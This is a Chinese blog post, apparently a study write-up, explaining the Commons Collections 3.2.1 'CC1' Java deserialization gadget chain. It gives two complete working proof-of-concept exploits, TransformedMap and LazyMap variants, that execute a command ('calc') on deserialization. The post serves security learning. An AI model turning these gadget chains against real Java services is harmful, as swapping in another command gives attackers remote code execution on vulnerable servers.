Java反序列化之CC1

已于 2023-03-02 10:08:30 修改
阅读量440 收藏
点赞数 1
分类专栏: Java安全 文章标签: java web安全 Powered by 金山文档
于 2023-03-02 09:54:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59924300/article/details/129294187
版权

组件介绍:

Apache Commons 当中有⼀个组件叫做 Apache Commons Collections ,主要封装了Java 的 Collection(集合) 相关类对象,它提供了很多强有⼒的数据结构类型并且实现了各种集合工具类。作为Apache开源项⽬的重要组件,Commons Collections被⼴泛应⽤于各种Java应⽤的开发,⽽正 是因为在⼤量web应⽤程序中这些类的实现以及⽅法的调⽤,导致了反序列化⽤漏洞的普遍性和严重性。

环境准备:

  1. 创建一个mvn项目并且导入Commons Collections,

<dependencies>
    <dependency>
        <groupId>commons-collections</groupId>
        <artifactId>commons-collections</artifactId>
        <version>3.2.1</version>
    </dependency>
</dependencies>

  1. 为了方便调试,需要下载对应的JDK源码:

https://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/af660750b2f4

下载完之后,需要把jdk/src/share/classes/中的sun文件夹粘贴到\Java\jdk1.8.0_65,参照下面图片(借用大佬图片):

之后打开idea里面的项目结构选项,按照下面图片进行导入SUN源码:

CC1链反序列化学习

CC1链这次学习分为两条链子TransformerMap链和Lazymap链下面进行简单学习

在此之前需要了解实现Transformer(接收一个对象,然后对Object作一些操作并输出)接口的方法:

  1. ChainedTransformer官方注释:

ChainedTransformer 是 Apache Commons Collections 库中的一个类,它是一个转换器(Transformer)的链表,将多个转换器链接在一起以进行多次转换操作。每次转换的输出结果将作为下一次转换的输入。

  1. InvokerTransformer官方解释:

InvokerTransformer 是 Apache Commons Collections 库中的一个类,它可以通过反射机制调用指定对象的指定方法,并返回方法执行结果。它是一个转换器(Transformer)实现,用于将输入对象转换为调用指定方法后的返回值。InvokerTransformer充当一个后门来使用,后面会说明。

  1. ConstantTransformer官方解释

ConstantTransformer 是 Apache Commons Collections 库中的一个类,它是一个转换器(Transformer)实现,用于将输入对象转换为一个固定的常量值。

  1. TransformedMap官方解释:

TransformedMap 是 Apache Commons Collections 框架中的一个类,它实现了一个 Map 接口,可以对其所包含的键值对进行转换操作。可以在原有的 Map 对象的基础上,提供一种能够对键或值进行自定义转换的方式。具体来说,TransformedMap 实例将会对 get、put 和 containsKey 方法进行重载,从而在访问 Map 中的键值对时,通过指定的转换器来对键或值进行转换操作。

TransformerMap链

首先,通过简单的方法来调用计算器:

    Runtime.getRuntime().exec("calc");

之后使用反射来调用计算器

package FlynAAAA;

import org.apache.commons.collections.map.TransformedMap;

import java.io.File;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

public class CC1_TransformerMap {
    public static void main (String[] args) throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
        Runtime c=Runtime.getRuntime(); //创建一个 Runtime 对象,并将其赋值给变量 c。
        Class r=Runtime.class;//获取 Runtime 类的 Class 对象,并将其赋值给变量 r。
        Method exec=c.getClass().getMethod("exec",String.class);//使用反射机制获取 Runtime 类的 exec 方法,exec 方法时需要传入一个命令字符串作为参数,该字符串指定要执行的命令。
        exec.invoke(c,"calc");//里传入的是 "calc",即启动 Windows 计算器程

    }
}

为什么说InvokerTransformer相当于一个后门程序,下面是他的构造方法,第一个参数:是需要调用的方法,第二个参数是以数组的形式接收,该方法的有参构造函数的类型,第三个,构造函数的参数值

下面是InvokerTransformer中的Transformer方法iMethodName、iParamTypes以及input都可控,而且使用的是反射的方法,调用指定对象的指定方法,并返回方法执行结果。

那么就可以使用InvokerTransformer来调用计算器:

package FlynAAAA;

import com.sun.org.apache.bcel.internal.generic.NEW;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.File;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

public class CC1_TransformerMap {
    public static void main (String[] args) throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
        Runtime r=Runtime.getRuntime();
        new InvokerTransformer("exec",new Class[]{String.class}, new Object[]{"calc"}).transform(r);

    }
}

了解之后进行一个练习,使用反射嵌套InvokerTransformer来调用计算器:

package FlynAAAA;

import com.sun.org.apache.bcel.internal.generic.NEW;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.File;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

public class CC1_TransformerMap {
    public static void main (String[] args) throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
       //题目:
        // Class c=Runtime.class;
        //Method getRunTimeMethod= c.getMethod("getRuntime",null);
        //Runtime r= (Runtime)getRunTimeMethod.invoke(null,null);
        //Method execMethod= c.getMethod("exec", String.class);
        //execMethod.invoke(r,"calc");

        //解答:
        Method m1=(Method) new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class}, new Object[]{"getRuntime",null}).transform(Runtime.class);
        Runtime m2=(Runtime)new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}).transform(m1);
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(m2);
    }
}

之后查找谁调用了tranform的方法:

可以看出在TransformerMap和Lazymap都有使用Transforme方法

先看TransformerMap#checkSetValue,这是protected方法,需要使用反射进行调用,跟踪变量valueTransformer

从TransformerMap的初始化类中看出,接收一个map数组也就是需要处理的数组,

TransformerMa类是通过decorate方法对map进行修饰。

紧接着使用cheackSetValue()进行计算器调用:

package FlynAAAA;

import com.sun.org.apache.bcel.internal.generic.NEW;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.File;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

public class CC1_TransformerMap {
    public static void main (String[] args) throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
        Runtime r = Runtime.getRuntime();
        InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
        HashMap<Object, Object> map = new HashMap<>();
        map.put("value", "bbbbb");
        Map<Object, Object> transformedMap = TransformedMap.decorate(map, null,invokerTransformer);

        //通过反射的方法调用checkSetValue
        Method cheack=TransformedMap.class.getDeclaredMethod("checkSetValue", Object.class);
        cheack.setAccessible(true);
        cheack.invoke(transformedMap,r);
    }
}

接下来查看是谁调用了cheackSetValue()方法,在AbstractMapEntryDecorator这个抽象对象中的静态类MapEntry继承了AbstractMapEntryDecorator抽象类

而AbstractMapEntryDecorator又实现了Map.Entry接口,可以看出MapEntry中的setValue方法其实就是Entry中的setValue方法,一个entry就是一对键值,可以通过遍历entry执行setValue()方法。来进行调用计算器

接下来使用SetValue来调用计算器

package FlynAAAA;

import com.sun.org.apache.bcel.internal.generic.NEW;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.File;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

public class CC1_TransformerMap {
    public static void main (String[] args) throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
        Runtime r = Runtime.getRuntime();
        InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});
        HashMap<Object, Object> map = new HashMap<>();
        map.put("aaaa", "bbbbb");
        Map<Object, Object> transformedMap = TransformedMap.decorate(map, null,invokerTransformer);

        for (Map.Entry entry:transformedMap.entrySet()){
            entry.setValue(r);

        }
    }
}

那么此时如果有某个readObject()中使用Map.Entry去迭代集合,且中间使用可控变量调用了setValue(),就可以以这个为入口点,进行反序列化。

搜索setValue,在AnnotationInvocationHandler#readObject()中有使用。

AnnotationInvocationHandler有一个构造函数,它接受两个参数:注解接口的Class对象和一个Map对象,该Map对象包含注解属性的值。当在注解接口上调用方法时,AnnotationInvocationHandler会在Map中查找相应属性的值,并将其作为方法调用的结果返回。

PPs:
Object o = AnnotationInvocationHandler.newInstance(Target.class, transformedMap);

但是有几个问题:

1、Runtime没有实现Serialize接口,无法被序列化:

解决办法:

InvokerTransformer去实现:

Method m1=(Method) new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class}, new Object[]{"getRuntime",null}).transform(Runtime.class);
Runtime m2=(Runtime)new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}).transform(m1);
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(m2);

2、触发setValue()之前的两个if条件

解决方法:

第一个if:map的键在注解中必须存在,意思是就是上面举例Target.class,map的键的键值必须在Target.class中

第二个if:map的键不能强制转换为value

setValue()中的值是一AnnotationTypeMismatchExceptionProxy对象而不是Transformer.

解决方法:

我们可以利用上面ConstantTransformer 和ChainedTransformer结合起来封装成Transformer。

Transformer[] Transformer=new Transformer[]{
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
        new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
        new  InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})

};
ChainedTransformer C=new  ChainedTransformer(Transformer);

ConstantTransformer类是用于将输入对象转换为一个固定的常量值。上面将他转换成Runtime.class

用ChainedTransformer把需要反射的链起来

最终poc

package FlynAAAA;

import com.sun.xml.internal.messaging.saaj.util.ByteOutputStream;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;


public class Test {
    public static void main (String[] args) throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, ClassNotFoundException, InstantiationException {
        //直接调用clac
        //Runtime.getRuntime().exec("calc");

        //通过反射调用
        // Runtime r=Runtime.getRuntime();
        //Class c=Runtime.class;
        //Method exec=c.getMethod("exec", String.class);
        //exec.invoke(r,"calc");
        //通过InvokerTransformer调用
        //Runtime r=Runtime.getRuntime();
       // new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(r);

        //通过CC里面的Transformemap里面的checkSetValue进行调用
        //Runtime r = Runtime.getRuntime();
       // InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});

        Transformer[] Transformer=new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new  InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})

        };
        ChainedTransformer C=new  ChainedTransformer(Transformer);
        HashMap<Object, Object> map = new HashMap<>();
        map.put("value", "bbbbb");
        Map<Object, Object> transformedMap = TransformedMap.decorate(map, null,C);

        //for (Map.Entry entry:transformedMap.entrySet()){
          //entry.setValue(r);
       // }
        Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor AnnotationInvocationHandler = c.getDeclaredConstructor(Class.class, Map.class);
        AnnotationInvocationHandler.setAccessible(true);
        Object o = AnnotationInvocationHandler.newInstance(Target.class, transformedMap);
       unseri(seri(o));
    }

    public static  byte[] seri (Object obj) throws IOException {
        ByteArrayOutputStream btout = new ByteArrayOutputStream();
        ObjectOutputStream OOS1 = new ObjectOutputStream(btout);

        OOS1.writeObject(obj);
        System.out.println(btout.toByteArray());
        return btout.toByteArray();
    }

    public static Object unseri (byte[] Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}

Lazymap链

从可以看出在TransformerMap和Lazymap都有使用Transforme方法,接下来看Lazymap

lazymap的实现方式是,在Map中添加一个Transformer对象作为值的默认值,当获取某个键的值时,如果该键不存在,就会使用Transformer对象来生成一个默认值,并将其作为该键的值。Transformer对象的实现方式可以是任何实现了Transformer接口的类下面是Lazymap的初始方法。

可以看见如果在get找不到键值的时候,它会调用factory.transform 方法去获取一个值:

而Lazy和transforMap一样,都是使用decorate()方法接收一个map和Transformer

AnnotationInvocationHandler的readObject()没有直接调用get(),所以ysoserial找到了另一条路,AnnotationInvocationHandler类的invoke方法有调用到get()方法

接下来有必要学习一下Java的动态代理:

Java 动态代理(Dynamic Proxy)是一种实现 AOP(Aspect Oriented Programming,面向切面编程)的方式,可以在运行时动态地创建代理类和对象。它可以使代码更加灵活、可扩展和可维护。

    public static Object newProxyInstance(ClassLoader loader, Class<?>[] interfaces, InvocationHandler h)

其中,loader 参数指定代理类的类加载器;interfaces 参数指定代理类要实现的接口列表;h 参数是一个实现了 InvocationHandler 接口的对象,用于处理代理类中方法的调用。

newProxyInstance() 方法返回的是一个代理类的实例,该实例实现了指定的接口列表,并将方法调用转发给指定的 InvocationHandler 对象处理。在代理类中,通过 InvocationHandler 对象的 invoke() 方法来处理方法调用。

例如(抄袭大佬的代码)

package LazyMap;

import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class App
{
    public static void main(String[] args) {
        /*
            自动生成代理类
                第一个参数: Classloader, 及代理角色
                第二个参数: Interface, 也就是抽象角色, 即我们要代理那个接口, 这里是Map
                第三个参数: InvocationHandler, 是一个实现了InvocationHandler接口的被代理类,里面包含了具体代理的逻辑
         */
        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class}, new ExampleInvocationHandler(new HashMap()));
        // 这里虽然调用的是 Map.put() 但由代理类触发, 就会优先调用 被代理类的invoke() 然后再反射调用 put()
        proxyMap.put("Hello","World");
        // 因为优先调用被代理类的invoke, 且我们的方法又刚好是 get()
        // 所以被 hook住, 返回的值也会变为 Hoooooook
        String res = (String) proxyMap.get("Hello");
        System.out.println(res);
    }
}
package LazyMap;

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.util.Map;
public class ExampleInvocationHandler implements InvocationHandler
{
    protected Map map;

    // 构造方法
    public ExampleInvocationHandler(Map map) {
        this.map = map;
    }


    // 重写invoke
    // 当这个类被代理后, 代理对象调用任意方法都会优先进入 被代理类的i nvoke方法
    @Override
    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
        if (method.getName().equals("get"))
        {
            System.out.println("方法 get() 已被劫持 !");
            return "Hoooooook";
        }
        return method.invoke(this.map,args);
    }
}

然后大致这样改POC

  1. 将TransformedMap更改类LazyMap

Map<Object,Object> decorate =  LazyMap.decorate(map, chainedTransformer);

  1. AnnotationInvocationHandler这个类实现了InvocationHandler接口,只需要在实例化它的时候,将它使用Proxy.newProxyInstance()代理,即可当代理类调用任意方法的时候,都会优先跑到AnnotationInvocationHandler这个类下的invoke()方法中

Class<?> clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor<?> clazzDeclaredConstructor = clazz.getDeclaredConstructor(Class.class, Map.class);
clazzDeclaredConstructor.setAccessible(true);
InvocationHandler handler = (InvocationHandler) clazzDeclaredConstructor.newInstance(Resource.class, decorate);
Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[] {Map.class}, handler);
Object o =  clazzDeclaredConstructor.newInstance(Target.class, proxyMap);

  1. 此时是一个Proxy类,而我们的触发点在AnnotationInvocationHandler#readObject(),所以在把这个类放到构造方法第三个参数

Object o =  clazzDeclaredConstructor.newInstance(Target.class, proxyMap);

完整POC:

package LazyMap;


import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import javax.annotation.Resource;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class LazyMapDemo {
    public static void main(String[] args) throws Exception{
        Transformer[] transformers = new Transformer[]
                {
                        new ConstantTransformer(Runtime.class),
                        new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                        new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                        new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
                };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        map.put("value",1);
        Map<Object,Object> decorate =  LazyMap.decorate(map, chainedTransformer);
        Class<?> clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> clazzDeclaredConstructor = clazz.getDeclaredConstructor(Class.class, Map.class);
        clazzDeclaredConstructor.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) clazzDeclaredConstructor.newInstance(Resource.class, decorate);
        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[] {Map.class}, handler);
        Object o =  clazzDeclaredConstructor.newInstance(Target.class, proxyMap);
        //new clazzDeclaredConstructor.newInstance(Target.class, proxyMap);
        serialize(o);
        unserialize("poc.ser");
//        proxyMap.size();

    }


    public static void serialize(Object obj) throws Exception
    {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("poc.ser"));
        oos.writeObject(obj);
    }
    public static Object unserialize(String filename) throws Exception
    {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename));
        return ois.readObject();
    }
}

FlynnAAAA
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RMIDeserialize:RMI 反序列化环境 一步步
04-22
RMI反序列化学习环境,细节请参考博客、 java -cp RMIDeserialize.jar com.lala.ServerAndRegister :起一个包含CC链可以被攻击的RMI服务 java -jar RMI-Bypass290.jar <攻击目标IP> <攻击目标端口> <本地...
Java反序列化之CommonsCollections(CC1)分析篇
qq_44029310的博客
11-23 909
ava反序列化之CommonsCollections篇(CC1)的一些过程分析。
Java 反序列化CC1-国内版
Mirror_iu的博客
02-23 171
跟着芜风师傅学习的CC链,我总结出了自己的一版。
JavaSec 基础之 CC1
akdelt的博客
03-11 324
调用了 checkSetValue。而且它是 TransformedMap 的父类。
Java反序列化之CommonsCollections(CC1)基础篇
qq_44029310的博客
11-14 1119
本文包括:Java反序列化之CommonsCollections篇(CC1)的一些基础知识概念。
Java反序列化CC1其一
莫慌的博客
06-21 161
非常好的java反序列化的文章,作者写的很详细,深入浅出
commons-collections1(cc1)反序列化链分析
遇事不决冲冲冲
01-30 5030
commons-collections1也就是常说的cc1,网上一般有两条链子,一个就是ysoserial中的lazymap链,还有transformedmap链,刚开始碰到cc1链子感觉有点麻烦,但只要迈出第一步后面就会挺流畅的,首先在细跟之前一定要有一个大的框架,哪一步完了再跟进到哪一步,像cc1这里主要就是Transformer接口里三个主要的实现类来实现命令执行,然后通过两个不同方法调用执行,即可!
java反序列化CC1
qq_62540010的博客
03-16 385
Java Commons Collections的利用链也被称为cc链,是在学习反序列化漏洞必不可少的一个部分。首先先介绍一下Commons Collection组件,Apache Commons 当中有⼀个组件叫做 Apache Commons Collections ,主要封装了Java 的 Collection(集合) 相关类对象,它提供了很多强有⼒的数据结构类型并且实现了各种集合⼯ 具类。collection是set,list,queue的抽象。
java反序列之CC1
Go_change的博客
05-09 220
序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,就是将对象转换成另一种形式,以方便跨平台存储和网络传输。反序列化则是将上述过程反过来进行的操作。在Java中任何一个对象必须要实现Serializable接口才可以执行序列化和反序列化操作。
Java反序列化CC1链 详解
Jay17的博客
10-06 787
Java反序列化CC1链 详解
Java安全 反序列化(3) CC1链-TransformedMap版
最新发布
qq_39947980的博客
03-21 1250
本文尝试从CC1的挖掘思路出发,理解CC1的实现原理
内存高效序列化库谷歌/ FlatBuffers
01-27
FlatBuffersFlatBuffers is a cross platform serialization library architected formaximum memory efficiency. It allows you to directly access serialized data without parsing/unpacking it first, while ...
GsonQuick:Gson的辅助工具类, 方便Gson的序列化
07-08
GsonQuickGson的辅助工具类, 方便Gson的序列化使用可以看Test里面的代码.示例Json如下: { "data": [{ "d": 771133, "a": 856813, "bigHash": "392b979d9568b2c9cc693ce577d7fadf" },{ "d": 123, "a": 43234, ...
schoolManager:使用面向对象概念并使用序列化来构建学校管理系统的学术工作
07-04
学校经理 Github: : 计算 II (2014-1) - CC / UFRRJ 团队成员: 保罗·泽维尔。 加布里埃尔·塞戈比亚 教师:Felipe Duarte
JRedisJSON:用于Redis RedisJSON的Java客户端(包装器)
05-14
该客户端提供对RedisJSON的Redis API的访问,并提供Java及其对象之间的来回序列化。 该项目当前为WIP,并且界面可能会更改。 另请注意,目前仅支持核心RedisJSON命令。 正式发布 < groupId>...
ApacheCC1 反序列化分析
m0_62466350的博客
12-13 866
cc全称,是apache基金会的一个项目,它提供了比原生的java更多的接口和方法,比如说我们平常使用HashMap时都是无序的,而Common-Collections中为我们提供了OrderedMap,我们可以调用OrderedMap来构造有序的map。在的父类内部的子类MapEntry中,我们找到了setValue方法。这里的parent是什么呢,我们看一下该函数所在类的构造方法:所以,我们在进行.decorate方法调用,进行 Map 遍历的时候,就会走到setValue()当中,而。
java反序列化 cc链1 分析
m0_64815693的博客
04-17 1249
java反序列化 cc链1 分析
Javaweb安全——反序列化漏洞- CC1
weixin_43610673的博客
05-24 1162
Common-Collections利用链1 第一次接触反序列化漏洞时写的初识Java反序列化漏洞这篇文章当中已经分析过一遍Common-Collections的两条链子(分别用的TransformedMap和LazyMap构造恶意对象反射链,AnnotationInvocationHandler(CC1)和BadAttributeValueExpException(CC5)调用transform())。这次从Common-Collections1开始再捋一遍,顺便自己写一遍exp加深印象。 本文环境为jd
java的bean对象通过注解在set方法实现自定义序列化
05-26
Java 中,我们可以通过实现 Serializable 接口来实现对象的序列化和反序列化。不过,有时候我们可能需要对某些属性进行自定义序列化,这时可以使用注解来实现。 假设有一个 Person 类,其中包含了 name、age 两...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值